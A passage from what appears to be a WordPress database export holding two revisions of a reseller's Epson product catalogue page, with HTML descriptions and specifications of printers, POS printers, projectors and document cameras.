ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:30:15','2019-09-25 09:30:15','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3466,1,'2019-09-25 17:25:29','2019-09-25 09:25:29','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton 